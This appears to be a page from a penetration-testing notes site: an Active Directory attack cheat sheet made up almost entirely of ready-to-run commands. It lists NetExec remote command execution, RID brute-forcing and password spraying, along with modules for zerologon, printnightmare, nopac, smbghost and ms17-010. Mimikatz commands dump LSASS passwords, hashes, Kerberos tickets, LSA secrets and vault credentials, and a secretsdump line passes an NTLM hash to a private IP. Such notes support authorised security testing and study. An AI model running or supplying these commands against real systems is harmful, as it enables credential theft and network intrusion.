AD Tools

Netexec

# Protocole Enumeration
netexec rdp   $ip -u 'user' -p 'pass' -x whoami
netexec wmi   $ip -u 'user' -p 'pass' -x whoami
netexec smb   $ip -u 'user' -p 'pass' -x whoami
netexec ldap  $ip -u 'user' -p 'pass'
netexec ftp   $ip -u 'user' -p 'pass'
netexec vnc   $ip -u 'user' -p 'pass'
netexec winrm $ip -u 'user' -p 'pass' -x whoami
netexec ssh   $ip -u 'user' -p 'pass' -x whoami
netexec nfs   $ip -u 'user' -p 'pass'
netexec mssql $ip -u 'user' -p 'pass' -x whoami

# SMB Module
netexec smb   $ip -u 'user' -p 'password'
netexec smb   $ip -u 'user' -p 'password' --local-auth
netexec smb   $ip -u 'user' -p 'password' --shares
netexec smb   $ip -u 'guest' -p '' --rid-brute
netexec smb   $ip -u users.txt -p passwords.txt --continue-on-success

# Vulnerabilities Scan : www.netexec.wiki/smb-protocol/scan-for-vulnerabilities
netexec smb   $ip -u 'user' -p 'pass' -M zerologon 
netexec smb   $ip -u 'user' -p 'pass' -M printnightmare 
netexec smb   $ip -u 'user' -p 'pass' -M nopac 
netexec smb   $ip -u 'user' -p 'pass' -M smbghost 
netexec smb   $ip -u 'user' -p 'pass' -M ms17-010 
netexec smb   $ip -u 'user' -p 'pass' -M coerce_plus

Mimikatz

# Enable SeDebugPrivilege access right
privilege::debug
log
# Elevate to SYSTEM user privileges
token::elevate
# Extract Passwords/Hashes from the system
sekurlsa::logonpasswords
lsadump::sam
sekurlsa::tickets
sekurlsa::wdigest
# sekurlsa : Extracts passwords, keys, pin codes, tickets from the memory of LSASS
sekurlsa::ekeys
sekurlsa::dpapi
sekurlsa::msv
sekurlsa::kerberos
# lsadump : Dump credential / secret / account data from LSA
lsadump::secrets
lsadump::cache
# vault : Dump Windows Credential Vault entries
vault::cred /patch

# Dumping Hashes remotely
secretsdump.py administrator@192.168.194.141 -hashes :3c4495bbd678fac8c9d218be4f2bbc7b

PreviousActive Directory NextLateral Movement

Last updated 20 days ago